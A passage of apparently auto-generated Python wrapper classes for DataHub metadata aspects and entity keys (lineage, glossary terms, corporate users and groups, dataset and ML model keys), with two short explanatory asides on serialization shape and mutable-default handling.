"""Setter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
self._inner_dict['deleted'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Documentation of the dataset"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Documentation of the dataset"""
self._inner_dict['description'] = value
class UpstreamClass(DictWrapper):
"""Upstream lineage information about a dataset including the source reporting the lineage"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dataset.Upstream")
def __init__(self,
dataset: str,
type: Union[str, "DatasetLineageTypeClass"],
auditStamp: Optional["AuditStampClass"]=None,
):
super().__init__()
if auditStamp is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.auditStamp = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["auditStamp"].default, writers_schema=self.RECORD_SCHEMA.field_map["auditStamp"].type)
else:
self.auditStamp = auditStamp
self.dataset = dataset
self.type = type
@classmethod
def construct_with_defaults(cls) -> "UpstreamClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.auditStamp = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["auditStamp"].default, writers_schema=self.RECORD_SCHEMA.field_map["auditStamp"].type)
self.dataset = str()
self.type = DatasetLineageTypeClass.COPY
@property
def auditStamp(self) -> "AuditStampClass":
"""Getter: Audit stamp containing who reported the lineage and when.
WARNING: this field is deprecated and may be removed in a future release."""
return self._inner_dict.get('auditStamp') # type: ignore
@auditStamp.setter
def auditStamp(self, value: "AuditStampClass") -> None:
"""Setter: Audit stamp containing who reported the lineage and when.
WARNING: this field is deprecated and may be removed in a future release."""
self._inner_dict['auditStamp'] = value
@property
def dataset(self) -> str:
"""Getter: The upstream dataset the lineage points to"""
return self._inner_dict.get('dataset') # type: ignore
@dataset.setter
def dataset(self, value: str) -> None:
"""Setter: The upstream dataset the lineage points to"""
self._inner_dict['dataset'] = value
@property
def type(self) -> Union[str, "DatasetLineageTypeClass"]:
"""Getter: The type of the lineage"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[str, "DatasetLineageTypeClass"]) -> None:
"""Setter: The type of the lineage"""
self._inner_dict['type'] = value
class UpstreamLineageClass(DictWrapper):
"""Upstream lineage of a dataset"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dataset.UpstreamLineage")
def __init__(self,
upstreams: List["UpstreamClass"],
):
super().__init__()
self.upstreams = upstreams
@classmethod
def construct_with_defaults(cls) -> "UpstreamLineageClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.upstreams = list()
@property
def upstreams(self) -> List["UpstreamClass"]:
"""Getter: List of upstream dataset lineage information"""
return self._inner_dict.get('upstreams') # type: ignore
@upstreams.setter
def upstreams(self, value: List["UpstreamClass"]) -> None:
"""Setter: List of upstream dataset lineage information"""
self._inner_dict['upstreams'] = value
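Serialized, an UpstreamLineage aspect nests Upstream records, each carrying a dataset urn, a lineage type, and a defaulted audit stamp. A sketch of that shape using plain dicts (the urns below are made up for illustration):

```python
# Plain-dict stand-ins for UpstreamClass / UpstreamLineageClass showing
# the nesting the wrappers manage; field names mirror the aspect schema.
upstream = {
    "dataset": "urn:li:dataset:(urn:li:dataPlatform:hive,db.events,PROD)",
    "type": "TRANSFORMED",  # a DatasetLineageType string constant
    "auditStamp": {"time": 0, "actor": "urn:li:corpuser:unknown"},  # schema default
}
lineage = {"upstreams": [upstream]}
```

The wrapper classes above produce exactly this structure in their `_inner_dict`, with `auditStamp` filled from the record schema's default when the caller omits it.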
class GlossaryNodeInfoClass(DictWrapper):
"""Properties associated with a GlossaryNode"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.glossary.GlossaryNodeInfo")
def __init__(self,
definition: str,
parentNode: Union[None, str]=None,
):
super().__init__()
self.definition = definition
self.parentNode = parentNode
@classmethod
def construct_with_defaults(cls) -> "GlossaryNodeInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.definition = str()
self.parentNode = self.RECORD_SCHEMA.field_map["parentNode"].default
@property
def definition(self) -> str:
"""Getter: Definition of business node"""
return self._inner_dict.get('definition') # type: ignore
@definition.setter
def definition(self, value: str) -> None:
"""Setter: Definition of business node"""
self._inner_dict['definition'] = value
@property
def parentNode(self) -> Union[None, str]:
"""Getter: Parent node of the glossary term"""
return self._inner_dict.get('parentNode') # type: ignore
@parentNode.setter
def parentNode(self, value: Union[None, str]) -> None:
"""Setter: Parent node of the glossary term"""
self._inner_dict['parentNode'] = value
class GlossaryTermInfoClass(DictWrapper):
"""Properties associated with a GlossaryTerm"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.glossary.GlossaryTermInfo")
def __init__(self,
definition: str,
termSource: str,
parentNode: Union[None, str]=None,
sourceRef: Union[None, str]=None,
sourceUrl: Union[None, str]=None,
customProperties: Optional[Dict[str, str]]=None,
):
super().__init__()
self.definition = definition
self.parentNode = parentNode
self.termSource = termSource
self.sourceRef = sourceRef
self.sourceUrl = sourceUrl
if customProperties is None:
# default: {}
self.customProperties = dict()
else:
self.customProperties = customProperties
@classmethod
def construct_with_defaults(cls) -> "GlossaryTermInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.definition = str()
self.parentNode = self.RECORD_SCHEMA.field_map["parentNode"].default
self.termSource = str()
self.sourceRef = self.RECORD_SCHEMA.field_map["sourceRef"].default
self.sourceUrl = self.RECORD_SCHEMA.field_map["sourceUrl"].default
self.customProperties = dict()
@property
def definition(self) -> str:
"""Getter: Definition of business term"""
return self._inner_dict.get('definition') # type: ignore
@definition.setter
def definition(self, value: str) -> None:
"""Setter: Definition of business term"""
self._inner_dict['definition'] = value
@property
def parentNode(self) -> Union[None, str]:
"""Getter: Parent node of the glossary term"""
return self._inner_dict.get('parentNode') # type: ignore
@parentNode.setter
def parentNode(self, value: Union[None, str]) -> None:
"""Setter: Parent node of the glossary term"""
self._inner_dict['parentNode'] = value
@property
def termSource(self) -> str:
"""Getter: Source of the Business Term (INTERNAL or EXTERNAL) with default value as INTERNAL"""
return self._inner_dict.get('termSource') # type: ignore
@termSource.setter
def termSource(self, value: str) -> None:
"""Setter: Source of the Business Term (INTERNAL or EXTERNAL) with default value as INTERNAL"""
self._inner_dict['termSource'] = value
@property
def sourceRef(self) -> Union[None, str]:
"""Getter: External Reference to the business-term"""
return self._inner_dict.get('sourceRef') # type: ignore
@sourceRef.setter
def sourceRef(self, value: Union[None, str]) -> None:
"""Setter: External Reference to the business-term"""
self._inner_dict['sourceRef'] = value
@property
def sourceUrl(self) -> Union[None, str]:
"""Getter: The abstracted URL such as https://spec.edmcouncil.org/fibo/ontology/FBC/FinancialInstruments/FinancialInstruments/CashInstrument."""
return self._inner_dict.get('sourceUrl') # type: ignore
@sourceUrl.setter
def sourceUrl(self, value: Union[None, str]) -> None:
"""Setter: The abstracted URL such as https://spec.edmcouncil.org/fibo/ontology/FBC/FinancialInstruments/FinancialInstruments/CashInstrument."""
self._inner_dict['sourceUrl'] = value
@property
def customProperties(self) -> Dict[str, str]:
"""Getter: A key-value map to capture any other non-standardized properties for the glossary term"""
return self._inner_dict.get('customProperties') # type: ignore
@customProperties.setter
def customProperties(self, value: Dict[str, str]) -> None:
"""Setter: A key-value map to capture any other non-standardized properties for the glossary term"""
self._inner_dict['customProperties'] = value
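Note that `customProperties` (like `tags` and `teams` elsewhere in this file) defaults to `None` and is replaced with a fresh container inside the constructor; a literal `={}` default in the signature would be shared across all instances. The idiom in isolation (`make_properties` is a hypothetical helper, not part of this module):

```python
from typing import Dict, Optional


def make_properties(custom: Optional[Dict[str, str]] = None) -> Dict[str, str]:
    # A fresh dict per call; writing `custom: Dict[str, str] = {}` in the
    # signature would create one dict shared by every call that omits it.
    return dict(custom) if custom is not None else {}
```

The generated constructors use the same `None`-sentinel check rather than mutable defaults.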
class CorpGroupInfoClass(DictWrapper):
"""group of corpUser, it may contains nested group"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.identity.CorpGroupInfo")
def __init__(self,
email: str,
admins: List[str],
members: List[str],
groups: List[str],
):
super().__init__()
self.email = email
self.admins = admins
self.members = members
self.groups = groups
@classmethod
def construct_with_defaults(cls) -> "CorpGroupInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.email = str()
self.admins = list()
self.members = list()
self.groups = list()
@property
def email(self) -> str:
"""Getter: email of this group"""
return self._inner_dict.get('email') # type: ignore
@email.setter
def email(self, value: str) -> None:
"""Setter: email of this group"""
self._inner_dict['email'] = value
@property
def admins(self) -> List[str]:
"""Getter: owners of this group"""
return self._inner_dict.get('admins') # type: ignore
@admins.setter
def admins(self, value: List[str]) -> None:
"""Setter: owners of this group"""
self._inner_dict['admins'] = value
@property
def members(self) -> List[str]:
"""Getter: List of ldap urn in this group."""
return self._inner_dict.get('members') # type: ignore
@members.setter
def members(self, value: List[str]) -> None:
"""Setter: List of ldap urn in this group."""
self._inner_dict['members'] = value
@property
def groups(self) -> List[str]:
"""Getter: List of groups in this group."""
return self._inner_dict.get('groups') # type: ignore
@groups.setter
def groups(self, value: List[str]) -> None:
"""Setter: List of groups in this group."""
self._inner_dict['groups'] = value
class CorpUserEditableInfoClass(DictWrapper):
"""Linkedin corp user information that can be edited from UI"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.identity.CorpUserEditableInfo")
def __init__(self,
aboutMe: Union[None, str]=None,
teams: Optional[List[str]]=None,
skills: Optional[List[str]]=None,
pictureLink: Optional[str]=None,
):
super().__init__()
self.aboutMe = aboutMe
if teams is None:
# default: []
self.teams = list()
else:
self.teams = teams
if skills is None:
# default: []
self.skills = list()
else:
self.skills = skills
if pictureLink is None:
# default: 'https://raw.githubusercontent.com/linkedin/datahub/master/datahub-web/packages/data-portal/public/assets/images/default_avatar.png'
self.pictureLink = self.RECORD_SCHEMA.field_map["pictureLink"].default
else:
self.pictureLink = pictureLink
@classmethod
def construct_with_defaults(cls) -> "CorpUserEditableInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.aboutMe = self.RECORD_SCHEMA.field_map["aboutMe"].default
self.teams = list()
self.skills = list()
self.pictureLink = self.RECORD_SCHEMA.field_map["pictureLink"].default
@property
def aboutMe(self) -> Union[None, str]:
"""Getter: About me section of the user"""
return self._inner_dict.get('aboutMe') # type: ignore
@aboutMe.setter
def aboutMe(self, value: Union[None, str]) -> None:
"""Setter: About me section of the user"""
self._inner_dict['aboutMe'] = value
@property
def teams(self) -> List[str]:
"""Getter: Teams that the user belongs to e.g. Metadata"""
return self._inner_dict.get('teams') # type: ignore
@teams.setter
def teams(self, value: List[str]) -> None:
"""Setter: Teams that the user belongs to e.g. Metadata"""
self._inner_dict['teams'] = value
@property
def skills(self) -> List[str]:
"""Getter: Skills that the user possesses e.g. Machine Learning"""
return self._inner_dict.get('skills') # type: ignore
@skills.setter
def skills(self, value: List[str]) -> None:
"""Setter: Skills that the user possesses e.g. Machine Learning"""
self._inner_dict['skills'] = value
@property
def pictureLink(self) -> str:
"""Getter: A URL which points to a picture which user wants to set as a profile photo"""
return self._inner_dict.get('pictureLink') # type: ignore
@pictureLink.setter
def pictureLink(self, value: str) -> None:
"""Setter: A URL which points to a picture which user wants to set as a profile photo"""
self._inner_dict['pictureLink'] = value
class CorpUserInfoClass(DictWrapper):
"""Linkedin corp user information"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.identity.CorpUserInfo")
def __init__(self,
active: bool,
email: str,
displayName: Union[None, str]=None,
title: Union[None, str]=None,
managerUrn: Union[None, str]=None,
departmentId: Union[None, int]=None,
departmentName: Union[None, str]=None,
firstName: Union[None, str]=None,
lastName: Union[None, str]=None,
fullName: Union[None, str]=None,
countryCode: Union[None, str]=None,
):
super().__init__()
self.active = active
self.displayName = displayName
self.email = email
self.title = title
self.managerUrn = managerUrn
self.departmentId = departmentId
self.departmentName = departmentName
self.firstName = firstName
self.lastName = lastName
self.fullName = fullName
self.countryCode = countryCode
@classmethod
def construct_with_defaults(cls) -> "CorpUserInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.active = bool()
self.displayName = self.RECORD_SCHEMA.field_map["displayName"].default
self.email = str()
self.title = self.RECORD_SCHEMA.field_map["title"].default
self.managerUrn = self.RECORD_SCHEMA.field_map["managerUrn"].default
self.departmentId = self.RECORD_SCHEMA.field_map["departmentId"].default
self.departmentName = self.RECORD_SCHEMA.field_map["departmentName"].default
self.firstName = self.RECORD_SCHEMA.field_map["firstName"].default
self.lastName = self.RECORD_SCHEMA.field_map["lastName"].default
self.fullName = self.RECORD_SCHEMA.field_map["fullName"].default
self.countryCode = self.RECORD_SCHEMA.field_map["countryCode"].default
@property
def active(self) -> bool:
"""Getter: Whether the corpUser is active, ref: https://iwww.corp.linkedin.com/wiki/cf/display/GTSD/Accessing+Active+Directory+via+LDAP+tools"""
return self._inner_dict.get('active') # type: ignore
@active.setter
def active(self, value: bool) -> None:
"""Setter: Whether the corpUser is active, ref: https://iwww.corp.linkedin.com/wiki/cf/display/GTSD/Accessing+Active+Directory+via+LDAP+tools"""
self._inner_dict['active'] = value
@property
def displayName(self) -> Union[None, str]:
"""Getter: displayName of this user , e.g. Hang Zhang(DataHQ)"""
return self._inner_dict.get('displayName') # type: ignore
@displayName.setter
def displayName(self, value: Union[None, str]) -> None:
"""Setter: displayName of this user , e.g. Hang Zhang(DataHQ)"""
self._inner_dict['displayName'] = value
@property
def email(self) -> str:
"""Getter: email address of this user"""
return self._inner_dict.get('email') # type: ignore
@email.setter
def email(self, value: str) -> None:
"""Setter: email address of this user"""
self._inner_dict['email'] = value
@property
def title(self) -> Union[None, str]:
"""Getter: title of this user"""
return self._inner_dict.get('title') # type: ignore
@title.setter
def title(self, value: Union[None, str]) -> None:
"""Setter: title of this user"""
self._inner_dict['title'] = value
@property
def managerUrn(self) -> Union[None, str]:
"""Getter: direct manager of this user"""
return self._inner_dict.get('managerUrn') # type: ignore
@managerUrn.setter
def managerUrn(self, value: Union[None, str]) -> None:
"""Setter: direct manager of this user"""
self._inner_dict['managerUrn'] = value
@property
def departmentId(self) -> Union[None, int]:
"""Getter: department id this user belong to"""
return self._inner_dict.get('departmentId') # type: ignore
@departmentId.setter
def departmentId(self, value: Union[None, int]) -> None:
"""Setter: department id this user belong to"""
self._inner_dict['departmentId'] = value
@property
def departmentName(self) -> Union[None, str]:
"""Getter: department name this user belong to"""
return self._inner_dict.get('departmentName') # type: ignore
@departmentName.setter
def departmentName(self, value: Union[None, str]) -> None:
"""Setter: department name this user belong to"""
self._inner_dict['departmentName'] = value
@property
def firstName(self) -> Union[None, str]:
"""Getter: first name of this user"""
return self._inner_dict.get('firstName') # type: ignore
@firstName.setter
def firstName(self, value: Union[None, str]) -> None:
"""Setter: first name of this user"""
self._inner_dict['firstName'] = value
@property
def lastName(self) -> Union[None, str]:
"""Getter: last name of this user"""
return self._inner_dict.get('lastName') # type: ignore
@lastName.setter
def lastName(self, value: Union[None, str]) -> None:
"""Setter: last name of this user"""
self._inner_dict['lastName'] = value
@property
def fullName(self) -> Union[None, str]:
"""Getter: Common name of this user, format is firstName + lastName (split by a whitespace)"""
return self._inner_dict.get('fullName') # type: ignore
@fullName.setter
def fullName(self, value: Union[None, str]) -> None:
"""Setter: Common name of this user, format is firstName + lastName (split by a whitespace)"""
self._inner_dict['fullName'] = value
@property
def countryCode(self) -> Union[None, str]:
"""Getter: two uppercase letters country code. e.g. US"""
return self._inner_dict.get('countryCode') # type: ignore
@countryCode.setter
def countryCode(self, value: Union[None, str]) -> None:
"""Setter: two uppercase letters country code. e.g. US"""
self._inner_dict['countryCode'] = value
class ChartKeyClass(DictWrapper):
"""Key for a Chart"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.ChartKey")
def __init__(self,
dashboardTool: str,
chartId: str,
):
super().__init__()
self.dashboardTool = dashboardTool
self.chartId = chartId
@classmethod
def construct_with_defaults(cls) -> "ChartKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.dashboardTool = str()
self.chartId = str()
@property
def dashboardTool(self) -> str:
"""Getter: The name of the dashboard tool such as looker, redash etc."""
return self._inner_dict.get('dashboardTool') # type: ignore
@dashboardTool.setter
def dashboardTool(self, value: str) -> None:
"""Setter: The name of the dashboard tool such as looker, redash etc."""
self._inner_dict['dashboardTool'] = value
@property
def chartId(self) -> str:
"""Getter: Unique id for the chart. This id should be globally unique for a dashboarding tool even when there are multiple deployments of it. As an example, chart URL could be used here for Looker such as 'looker.linkedin.com/looks/1234'"""
return self._inner_dict.get('chartId') # type: ignore
@chartId.setter
def chartId(self, value: str) -> None:
"""Setter: Unique id for the chart. This id should be globally unique for a dashboarding tool even when there are multiple deployments of it. As an example, chart URL could be used here for Looker such as 'looker.linkedin.com/looks/1234'"""
self._inner_dict['chartId'] = value
class CorpGroupKeyClass(DictWrapper):
"""Key for a CorpGroup"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.CorpGroupKey")
def __init__(self,
name: str,
):
super().__init__()
self.name = name
@classmethod
def construct_with_defaults(cls) -> "CorpGroupKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.name = str()
@property
def name(self) -> str:
"""Getter: The name of the AD/LDAP group."""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: The name of the AD/LDAP group."""
self._inner_dict['name'] = value
class CorpUserKeyClass(DictWrapper):
"""Key for a CorpUser"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.CorpUserKey")
def __init__(self,
username: str,
):
super().__init__()
self.username = username
@classmethod
def construct_with_defaults(cls) -> "CorpUserKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.username = str()
@property
def username(self) -> str:
"""Getter: The name of the AD/LDAP user."""
return self._inner_dict.get('username') # type: ignore
@username.setter
def username(self, value: str) -> None:
"""Setter: The name of the AD/LDAP user."""
self._inner_dict['username'] = value
class DashboardKeyClass(DictWrapper):
"""Key for a Dashboard"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.DashboardKey")
def __init__(self,
dashboardTool: str,
dashboardId: str,
):
super().__init__()
self.dashboardTool = dashboardTool
self.dashboardId = dashboardId
@classmethod
def construct_with_defaults(cls) -> "DashboardKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.dashboardTool = str()
self.dashboardId = str()
@property
def dashboardTool(self) -> str:
"""Getter: The name of the dashboard tool such as looker, redash etc."""
return self._inner_dict.get('dashboardTool') # type: ignore
@dashboardTool.setter
def dashboardTool(self, value: str) -> None:
"""Setter: The name of the dashboard tool such as looker, redash etc."""
self._inner_dict['dashboardTool'] = value
@property
def dashboardId(self) -> str:
"""Getter: Unique id for the dashboard. This id should be globally unique for a dashboarding tool even when there are multiple deployments of it. As an example, dashboard URL could be used here for Looker such as 'looker.linkedin.com/dashboards/1234'"""
return self._inner_dict.get('dashboardId') # type: ignore
@dashboardId.setter
def dashboardId(self, value: str) -> None:
"""Setter: Unique id for the dashboard. This id should be globally unique for a dashboarding tool even when there are multiple deployments of it. As an example, dashboard URL could be used here for Looker such as 'looker.linkedin.com/dashboards/1234'"""
self._inner_dict['dashboardId'] = value
class DataFlowKeyClass(DictWrapper):
"""Key for a Data Flow"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.DataFlowKey")
def __init__(self,
orchestrator: str,
flowId: str,
cluster: str,
):
super().__init__()
self.orchestrator = orchestrator
self.flowId = flowId
self.cluster = cluster
@classmethod
def construct_with_defaults(cls) -> "DataFlowKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.orchestrator = str()
self.flowId = str()
self.cluster = str()
@property
def orchestrator(self) -> str:
"""Getter: Workflow manager like azkaban, airflow which orchestrates the flow"""
return self._inner_dict.get('orchestrator') # type: ignore
@orchestrator.setter
def orchestrator(self, value: str) -> None:
"""Setter: Workflow manager like azkaban, airflow which orchestrates the flow"""
self._inner_dict['orchestrator'] = value
@property
def flowId(self) -> str:
"""Getter: Unique Identifier of the data flow"""
return self._inner_dict.get('flowId') # type: ignore
@flowId.setter
def flowId(self, value: str) -> None:
"""Setter: Unique Identifier of the data flow"""
self._inner_dict['flowId'] = value
@property
def cluster(self) -> str:
"""Getter: Cluster where the flow is executed"""
return self._inner_dict.get('cluster') # type: ignore
@cluster.setter
def cluster(self, value: str) -> None:
"""Setter: Cluster where the flow is executed"""
self._inner_dict['cluster'] = value
class DataJobKeyClass(DictWrapper):
"""Key for a Data Job"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.DataJobKey")
def __init__(self,
flow: str,
jobId: str,
):
super().__init__()
self.flow = flow
self.jobId = jobId
@classmethod
def construct_with_defaults(cls) -> "DataJobKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.flow = str()
self.jobId = str()
@property
def flow(self) -> str:
"""Getter: Standardized data processing flow urn representing the flow for the job"""
return self._inner_dict.get('flow') # type: ignore
@flow.setter
def flow(self, value: str) -> None:
"""Setter: Standardized data processing flow urn representing the flow for the job"""
self._inner_dict['flow'] = value
@property
def jobId(self) -> str:
"""Getter: Unique Identifier of the data job"""
return self._inner_dict.get('jobId') # type: ignore
@jobId.setter
def jobId(self, value: str) -> None:
"""Setter: Unique Identifier of the data job"""
self._inner_dict['jobId'] = value
class DataPlatformKeyClass(DictWrapper):
"""Key for a Data Platform"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.DataPlatformKey")
def __init__(self,
platformName: str,
):
super().__init__()
self.platformName = platformName
@classmethod
def construct_with_defaults(cls) -> "DataPlatformKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.platformName = str()
@property
def platformName(self) -> str:
"""Getter: Data platform name i.e. hdfs, oracle, espresso"""
return self._inner_dict.get('platformName') # type: ignore
@platformName.setter
def platformName(self, value: str) -> None:
"""Setter: Data platform name i.e. hdfs, oracle, espresso"""
self._inner_dict['platformName'] = value
class DataProcessKeyClass(DictWrapper):
"""Key for a Data Process"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.DataProcessKey")
def __init__(self,
name: str,
orchestrator: str,
origin: Union[str, "FabricTypeClass"],
):
super().__init__()
self.name = name
self.orchestrator = orchestrator
self.origin = origin
@classmethod
def construct_with_defaults(cls) -> "DataProcessKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.name = str()
self.orchestrator = str()
self.origin = FabricTypeClass.DEV
@property
def name(self) -> str:
"""Getter: Process name i.e. an ETL job name"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Process name i.e. an ETL job name"""
self._inner_dict['name'] = value
@property
def orchestrator(self) -> str:
"""Getter: Standardized Orchestrator where data process is defined.
TODO: Migrate towards something that can be validated like DataPlatform urn"""
return self._inner_dict.get('orchestrator') # type: ignore
@orchestrator.setter
def orchestrator(self, value: str) -> None:
"""Setter: Standardized Orchestrator where data process is defined.
TODO: Migrate towards something that can be validated like DataPlatform urn"""
self._inner_dict['orchestrator'] = value
@property
def origin(self) -> Union[str, "FabricTypeClass"]:
"""Getter: Fabric type where dataset belongs to or where it was generated."""
return self._inner_dict.get('origin') # type: ignore
@origin.setter
def origin(self, value: Union[str, "FabricTypeClass"]) -> None:
"""Setter: Fabric type where dataset belongs to or where it was generated."""
self._inner_dict['origin'] = value
class DatasetKeyClass(DictWrapper):
"""Key for a Dataset"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.DatasetKey")
def __init__(self,
platform: str,
name: str,
origin: Union[str, "FabricTypeClass"],
):
super().__init__()
self.platform = platform
self.name = name
self.origin = origin
@classmethod
def construct_with_defaults(cls) -> "DatasetKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.platform = str()
self.name = str()
self.origin = FabricTypeClass.DEV
@property
def platform(self) -> str:
"""Getter: Data platform urn associated with the dataset"""
return self._inner_dict.get('platform') # type: ignore
@platform.setter
def platform(self, value: str) -> None:
"""Setter: Data platform urn associated with the dataset"""
self._inner_dict['platform'] = value
@property
def name(self) -> str:
"""Getter: Dataset native name e.g. <db>.<table>, /dir/subdir/<name>, or <name>"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Dataset native name e.g. <db>.<table>, /dir/subdir/<name>, or <name>"""
self._inner_dict['name'] = value
@property
def origin(self) -> Union[str, "FabricTypeClass"]:
"""Getter: Fabric type where dataset belongs to or where it was generated."""
return self._inner_dict.get('origin') # type: ignore
@origin.setter
def origin(self, value: Union[str, "FabricTypeClass"]) -> None:
"""Setter: Fabric type where dataset belongs to or where it was generated."""
self._inner_dict['origin'] = value
class GlossaryNodeKeyClass(DictWrapper):
"""Key for a GlossaryNode"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.GlossaryNodeKey")
def __init__(self,
name: str,
):
super().__init__()
self.name = name
@classmethod
def construct_with_defaults(cls) -> "GlossaryNodeKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.name = str()
@property
def name(self) -> str:
# No docs available.
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
# No docs available.
self._inner_dict['name'] = value
class GlossaryTermKeyClass(DictWrapper):
"""Key for a GlossaryTerm"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.GlossaryTermKey")
def __init__(self,
name: str,
):
super().__init__()
self.name = name
@classmethod
def construct_with_defaults(cls) -> "GlossaryTermKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.name = str()
@property
def name(self) -> str:
# No docs available.
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
# No docs available.
self._inner_dict['name'] = value
class MLFeatureKeyClass(DictWrapper):
"""Key for an MLFeature"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.MLFeatureKey")
def __init__(self,
featureNamespace: str,
name: str,
):
super().__init__()
self.featureNamespace = featureNamespace
self.name = name
@classmethod
def construct_with_defaults(cls) -> "MLFeatureKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.featureNamespace = str()
self.name = str()
@property
def featureNamespace(self) -> str:
"""Getter: Namespace for the feature"""
return self._inner_dict.get('featureNamespace') # type: ignore
@featureNamespace.setter
def featureNamespace(self, value: str) -> None:
"""Setter: Namespace for the feature"""
self._inner_dict['featureNamespace'] = value
@property
def name(self) -> str:
"""Getter: Name of the feature"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Name of the feature"""
self._inner_dict['name'] = value
class MLFeatureTableKeyClass(DictWrapper):
"""Key for an MLFeatureTable"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.MLFeatureTableKey")
def __init__(self,
platform: str,
name: str,
):
super().__init__()
self.platform = platform
self.name = name
@classmethod
def construct_with_defaults(cls) -> "MLFeatureTableKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.platform = str()
self.name = str()
@property
def platform(self) -> str:
"""Getter: Data platform urn associated with the feature table"""
return self._inner_dict.get('platform') # type: ignore
@platform.setter
def platform(self, value: str) -> None:
"""Setter: Data platform urn associated with the feature table"""
self._inner_dict['platform'] = value
@property
def name(self) -> str:
"""Getter: Name of the feature table"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Name of the feature table"""
self._inner_dict['name'] = value
class MLModelKeyClass(DictWrapper):
"""Key for an ML model"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.MLModelKey")
def __init__(self,
platform: str,
name: str,
origin: Union[str, "FabricTypeClass"],
):
super().__init__()
self.platform = platform
self.name = name
self.origin = origin
@classmethod
def construct_with_defaults(cls) -> "MLModelKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.platform = str()
self.name = str()
self.origin = FabricTypeClass.DEV
@property
def platform(self) -> str:
"""Getter: Standardized platform urn for the model"""
return self._inner_dict.get('platform') # type: ignore
@platform.setter
def platform(self, value: str) -> None:
"""Setter: Standardized platform urn for the model"""
self._inner_dict['platform'] = value
@property
def name(self) -> str:
"""Getter: Name of the MLModel"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Name of the MLModel"""
self._inner_dict['name'] = value
@property
def origin(self) -> Union[str, "FabricTypeClass"]:
"""Getter: Fabric type where model belongs to or where it was generated"""
return self._inner_dict.get('origin') # type: ignore
@origin.setter
def origin(self, value: Union[str, "FabricTypeClass"]) -> None:
"""Setter: Fabric type where model belongs to or where it was generated"""
self._inner_dict['origin'] = value
class MLPrimaryKeyKeyClass(DictWrapper):
"""Key for an MLPrimaryKey"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.MLPrimaryKeyKey")
def __init__(self,
featureNamespace: str,
